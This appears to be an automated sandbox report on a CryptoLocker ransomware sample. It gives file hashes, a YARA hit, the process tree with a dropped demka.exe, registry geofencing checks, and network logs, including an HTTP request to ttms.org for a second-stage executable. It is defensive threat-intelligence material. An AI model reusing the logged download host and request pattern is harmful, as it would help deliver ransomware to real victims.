Analysis
- max time kernel: 150s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20240412-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 17/04/2024, 05:30 UTC
Static task: static1
Behavioral task: behavioral1
- Sample: 2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: 2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe
- Resource: win10v2004-20240412-en
General
- Target: 2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe
- Size: 33KB
- MD5: 1e098a91f5deba98f586a01e2b2206ba
- SHA1: 5063a0c4f10761292b4eb8bf8def94ff00034b2f
- SHA256: 0bc398c17feb0dc8a948419b48eb013cc133e2c14bd83e27974ae394f555f377
- SHA512: bc69df6db67952696e1ba387cace5fd3959003650b2b9279e542f5eafe30821564b7b32c8da18963344f3b53dce22d1e681d91cb3675412b0e4fda2dc43f9116
- SSDEEP: 384:bAvMaNGh4z7CG3POOvbRSLoF/F0QU5XYFnufc/zzo6cuM9gxrW:bAvJCYOOvbRPDEgXRcuM9gxa
Malware Config
Signatures
-
Detection of CryptoLocker Variants (1 IoC)
resource | yara_rule
behavioral2/files/0x000300000001e9b1-12.dat | CryptoLocker_rule2
-
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | 2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | demka.exe
-
Executes dropped EXE (1 IoC)
pid | Process
1408 | demka.exe
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory (3 IoCs)
description | pid | Process | procid_target
PID 4788 wrote to memory of 1408 | 4788 | 2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe | 87
PID 4788 wrote to memory of 1408 | 4788 | 2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe | 87
PID 4788 wrote to memory of 1408 | 4788 | 2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe | 87
Processes
1. C:\Users\Admin\AppData\Local\Temp\2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe"
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   PID: 4788
   2. C:\Users\Admin\AppData\Local\Temp\demka.exe (child of PID 4788)
      Command line: "C:\Users\Admin\AppData\Local\Temp\demka.exe"
      - Checks computer location settings
      - Executes dropped EXE
      PID: 1408
Network
-
Remote address: 8.8.8.8:53
Request: 0.159.190.20.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 82.90.14.23.in-addr.arpa IN PTR
Response: 82.90.14.23.in-addr.arpa IN PTR a23-14-90-82.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: ttms.org IN A
Response: ttms.org IN A 35.215.114.222
-
Remote address: 35.215.114.222:443
Request:
GET /config/UKo8.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: ttms.org
Cache-Control: no-cache
Response:
HTTP/1.1 404 Not Found
Date: Wed, 17 Apr 2024 05:31:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Httpd: 1
Host-Header: 8441280b0c35cbc1147f8ba998a563a7
X-Proxy-Cache: HIT
-
Remote address: 8.8.8.8:53
Request: 9.228.82.20.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 222.114.215.35.in-addr.arpa IN PTR
Response: 222.114.215.35.in-addr.arpa IN PTR 222.114.215.35.bc.googleusercontent.com
-
Remote address: 8.8.8.8:53
Request: 11.97.55.23.in-addr.arpa IN PTR
Response: 11.97.55.23.in-addr.arpa IN PTR a23-55-97-11.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: 21.114.53.23.in-addr.arpa IN PTR
Response: 21.114.53.23.in-addr.arpa IN PTR a23-53-114-21.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: 157.123.68.40.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 206.23.85.13.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 24.139.73.23.in-addr.arpa IN PTR
Response: 24.139.73.23.in-addr.arpa IN PTR a23-73-139-24.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: 172.210.232.199.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 14.227.111.52.in-addr.arpa IN PTR
Response: (none)
-
Traffic summary (sent | received | packets sent | packets received | type | request | response)
3.8kB | 90.7kB | 73 | 69 | HTTP Request | GET https://ttms.org/config/UKo8.exe | HTTP 404
71 B | 157 B | 1 | 1 | DNS Request | 0.159.190.20.in-addr.arpa |
70 B | 133 B | 1 | 1 | DNS Request | 82.90.14.23.in-addr.arpa |
54 B | 70 B | 1 | 1 | DNS Request | ttms.org | 35.215.114.222
70 B | 156 B | 1 | 1 | DNS Request | 9.228.82.20.in-addr.arpa |
73 B | 126 B | 1 | 1 | DNS Request | 222.114.215.35.in-addr.arpa |
70 B | 133 B | 1 | 1 | DNS Request | 11.97.55.23.in-addr.arpa |
71 B | 135 B | 1 | 1 | DNS Request | 21.114.53.23.in-addr.arpa |
72 B | 146 B | 1 | 1 | DNS Request | 157.123.68.40.in-addr.arpa |
71 B | 145 B | 1 | 1 | DNS Request | 206.23.85.13.in-addr.arpa |
71 B | 135 B | 1 | 1 | DNS Request | 24.139.73.23.in-addr.arpa |
72 B | 158 B | 1 | 1 | DNS Request | 14.227.111.52.in-addr.arpa |
74 B | 128 B | 1 | 1 | DNS Request | 172.210.232.199.in-addr.arpa |
-
MITRE ATT&CK Enterprise v15
Downloads
-
- Filesize: 34KB
- MD5: c412382b8f543f3d11ae17fd6e59b169
- SHA1: fc00fb65d8c790fe093beb011ec0e58715c62895
- SHA256: a0f7234c8e146726a9af0caaf249364badf34eefb5241f8cee4737cc74ab10fc
- SHA512: 89bf44da50a69b8a21568a1a80143b01db2fdcc5c742d5135359b12a12a0075826d47dd3a9d04419acf8bad41cef12cb9fa9b5ffabe2e45d6f5c646a31bf17a4